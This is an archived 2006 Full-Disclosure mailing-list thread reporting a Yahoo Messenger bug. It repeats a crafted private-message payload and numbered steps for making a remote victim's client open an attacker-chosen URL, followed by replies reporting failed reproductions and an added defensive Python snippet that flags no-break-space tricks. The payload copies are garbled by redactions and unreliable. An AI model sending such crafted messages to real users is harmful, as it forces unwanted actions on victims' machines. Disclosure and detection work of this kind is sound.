Re: [Full-disclosure] Yahoo messenger serious bug
I have had a private PoC for this for a few months now; it does work (although the PoC is slightly different and only requires one msg string to be sent).

cheers,
MW

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo messenger serious bug
didn't work for me either.

On 7/28/06, John Dietz <[EMAIL PROTECTED]> wrote:
> I just tried this in Messenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160, and the most I could get it to do was a Yahoo Search on the string.
>
> Other side sees:
>
> s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
>
> Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg : - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
>
> There must be some other settings on either Messenger or the computer itself for this to work as you say. Possibly a setting for Messenger to use your default browser for searches instead of the PM window?
>
> Cheers
>
> On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]> wrote:
> > Hi,
> > I found another vulnerability in yahoo messenger: if you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(" (without quotes), Yahoo messenger opens, in this case, google.com in the Internet Explorer of the remote victim.
> >
> > Yahoo messenger bug proof of concept:
> > 1. Open messenger and log in.
> > 2. Open a third-party yahoo chat client like yahelite through the Ymsgr protocol and log in with another account.
> > 3. Send a PM to the messenger account with this string:
> > s: helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
> > 4. The remote user will open www.google.com (you can change it).
> >
> > Note: "helomsg :" this space must be created with alt+0160, and this "s: " with a space:
> > s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
> >
> > Tested in yahoo messenger 7.0/7.5
> >
> > Regards.
>
> --
> There is intelligence in having all the answers, but wisdom lies in knowing which of the questions to answer.

--
-- h0 h0 h0 --
www.nopsled.net
Re: [Full-disclosure] Yahoo messenger serious bug
I just tried this in Messenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160, and the most I could get it to do was a Yahoo Search on the string.

Other side sees:

s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(

Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg : - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.

There must be some other settings on either Messenger or the computer itself for this to work as you say. Possibly a setting for Messenger to use your default browser for searches instead of the PM window?

Cheers

On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]> wrote:
> Hi,
> I found another vulnerability in yahoo messenger: if you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(" (without quotes), Yahoo messenger opens, in this case, google.com in the Internet Explorer of the remote victim.
>
> Yahoo messenger bug proof of concept:
> 1. Open messenger and log in.
> 2. Open a third-party yahoo chat client like yahelite through the Ymsgr protocol and log in with another account.
> 3. Send a PM to the messenger account with this string:
> s: helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
> 4. The remote user will open www.google.com (you can change it).
>
> Note: "helomsg :" this space must be created with alt+0160, and this "s: " with a space:
> s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
>
> Tested in yahoo messenger 7.0/7.5
>
> Regards.

--
There is intelligence in having all the answers, but wisdom lies in knowing which of the questions to answer.
[Full-disclosure] Yahoo messenger serious bug
Hi,

I found another vulnerability in yahoo messenger: if you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(" (without quotes), Yahoo messenger opens, in this case, google.com in the Internet Explorer of the remote victim.

Yahoo messenger bug proof of concept:

1. Open messenger and log in.
2. Open a third-party yahoo chat client like yahelite through the Ymsgr protocol and log in with another account.
3. Send a PM to the messenger account with this string:
   s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
4. The remote user will open www.google.com (you can change it).

Note: "helomsg :" this space must be created with alt+0160, and this "s: " with a space:
s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(

Tested in yahoo messenger 7.0/7.5

Regards.

__
Ask. Answer. Discover.
Everything you wanted to know, and what you never imagined, is on Yahoo! Respuestas (Beta).
Try it now! http://www.yahoo.com.ar/respuestas
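A defender-side example, added here and not code from this thread or from Yahoo: the note that the space after "helomsg" must be typed with Alt+0160 means the trigger depends on U+00A0 NO-BREAK SPACE, a character that renders exactly like a space but is not ASCII 0x20, so any client-side keyword or command matcher that only knows the ASCII space sees a different string than the user does. The snippet below canonicalises Unicode blanks before matching and flags inbound messages that pair a watched keyword with such a lookalike blank. The sample message, the watched keyword list and all function names are assumptions made for the illustration.

```python
import unicodedata

# Format-category code points that render as nothing at all; they are removed
# rather than turned into spaces so "helo<ZWSP>msg" canonicalises to "helomsg".
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def is_lookalike_blank(ch: str) -> bool:
    """True for any character that renders as blank but is not ASCII 0x20.

    Unicode category Zs covers NO-BREAK SPACE (U+00A0, what Alt+0160 types
    on Windows), the EN/EM spaces, NARROW NO-BREAK SPACE, IDEOGRAPHIC SPACE
    and friends; tab and newline are category Cc and are left alone.
    """
    return ch != " " and (unicodedata.category(ch) == "Zs" or ch in ZERO_WIDTH)


def find_lookalike_blanks(text: str) -> list:
    """Return (offset, 'U+XXXX NAME') for every lookalike blank in text."""
    return [
        (i, "U+%04X %s" % (ord(ch), unicodedata.name(ch, "UNNAMED")))
        for i, ch in enumerate(text)
        if is_lookalike_blank(ch)
    ]


def canonicalize(text: str) -> str:
    """Map visible-but-non-ASCII blanks to ' ' and drop zero-width ones.

    Keyword or command matching must run on this form, never on the raw
    text; otherwise 'helomsg\u00a0:' and 'helomsg :' take different paths.
    """
    out = []
    for ch in text:
        if ch in ZERO_WIDTH:
            continue
        out.append(" " if is_lookalike_blank(ch) else ch)
    return "".join(out)


def inspect_message(text: str, watched=("helomsg",)) -> dict:
    """Triage one inbound IM payload (hypothetical defender-side hook)."""
    canon = canonicalize(text)
    blanks = find_lookalike_blanks(text)
    hits = [kw for kw in watched if kw in canon.lower()]
    return {
        "canonical": canon,
        "lookalike_blanks": blanks,
        "watched_keywords": hits,
        # A watched keyword sitting next to a lookalike blank is the shape
        # the thread describes: the string only "works" with Alt+0160.
        "suspicious": bool(hits) and bool(blanks),
    }


# Constructed sample: the "s: helomsg" prefix from the thread with the space
# after "helomsg" typed as U+00A0; the rest of the payload is placeholder text.
SAMPLE = "s: helomsg\u00a0:+)-(%/?#()(=(/;<placeholder>msg:-"

if __name__ == "__main__":
    for key, value in inspect_message(SAMPLE).items():
        print(key, "=", value)
```

Run on the constructed sample, the report lists the NO-BREAK SPACE at offset 10, shows the canonical text with a plain space, and marks the message suspicious; the same text typed with an ordinary space is not flagged, which is the distinction John Dietz's failed repro hinges on.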